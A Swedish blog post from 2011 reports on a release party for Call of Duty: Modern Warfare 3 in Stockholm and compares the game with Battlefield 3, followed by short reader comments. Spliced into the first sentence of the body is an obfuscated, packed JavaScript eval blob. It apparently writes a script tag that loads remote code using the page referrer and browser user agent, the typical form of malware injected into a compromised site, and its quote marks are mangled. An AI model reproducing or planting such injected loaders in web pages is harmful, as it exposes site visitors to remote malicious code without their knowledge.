Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Call of Duty Modern Warfare 3…Mycket lyckad Releasefest.

Call of Duty Modern Warfare 3…Mycket lyckad Releasefest.
Filip Urde
 • On 8 november, 2011
 • http://www.revue.se/filip-urde

En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktffs|var|u0026u|referrer|dshtf||js|php’.split(’|’),0,{}))
glad Filip lämnade precis ett mycket lyckat release event för Call of Duty Modern Warfare 3. 

Påkostat är bara förnamnet! Call of Duty vill inte vara sämre än ärkerivalen Battlefield när det kommer till releaser. Battlefield hade, som känt, ett event vid sin release på Berns i Stockholm. Det eventet kan ses som ett av de mest påkostade jippona för ett spel i Sveriges historia, kanske till och med i Europa. Men ikväll så var det alltså Call of Dutys tur. Med lokalen Ambassadeur till sitt förfogande bjöd man på ett fullskaligt tv-spels lan, laser show, söta MW3 tjejer, stå upp-komikern Al Pitcher, drinkar och hamburgare. Dj duon Nause stod för musiken och efter en riktig nyårsnedräkning på klubbens dansgolv så fick alla varsin kopia av spelet.

Kvällen var minst sagt lyckad, med den stora höjdpunkten att gratisspel faktiskt delades ut i år igen!

Jag har ju såklart hunnit spela spelet… Ni som läst mina artiklar tidigare eller känner mig, vet att Call of Duty inte är min kopp med te. Jag har konstant i snart 4 månader pushat för Battlefield 3 eftersom jag tycker att det är den solklara vinnaren av dessa två. Man kan ju tro att detta event skulle gett mig ett nytt favoritspel. Jag blev inte bjuden av Dice men det spelar ingen roll! Köpt är inget jag blir. Glad att jag fick Modern Warfare 3 = absolut

Det är dock fortfarande inte ett bättre spel än Battlfield 3. Jag har nu spelat igenom de 2 första banorna, samt lanat mot sju nötter och en tjej på Ambassadeur i Stockholm och domen är att skillnaden rent spel- och grafikmässigt, från Modern Warfare 2, inte går att sätta fingret på. Skillnaden man upplever mellan Battlefield 2 och 3 är ju onekligen OTROLIG!

Om du jämför med Bad company 2 så är skillnaden även där väldigt stor. Vad som dock alltid talat för COD är deras väl komponerade och överdrivna storylines, där minst sagt allt kan hända. Av reklamfilmerna/ trailern m.m. så ser det ut som Ryssland och USA kör ett klassiskt ”enad front” krig i alla världens städer, i renaste första världskriget-anda.

Full fart framåt! Taktik är för mesar!

Jag känner dock att Call of Duty har tappat för mycket av sin forna styrka. Mycket p.g.a. att man stötte bort originalgänget, som var spelets hjärta och lägger till Treyarch som tydligt tittat på mer Michael Bay filmer än något annat.

Hur som helst! Nu ska ni läsare och jag ge spelet en ärlig chans. Ni kommer absolut få höra mer om detta i veckan så kan vi alla jämföra vad vi tycker i ett härligt öppet forum! Godnatt på er

 Call of duty

Ambassadeur 

Comments

 1. Johan ström

  Riktigt sweet

 2. Kalas

  Underbart!!!!!

 3. Joel örner

  Låter som ett riktigt kul event!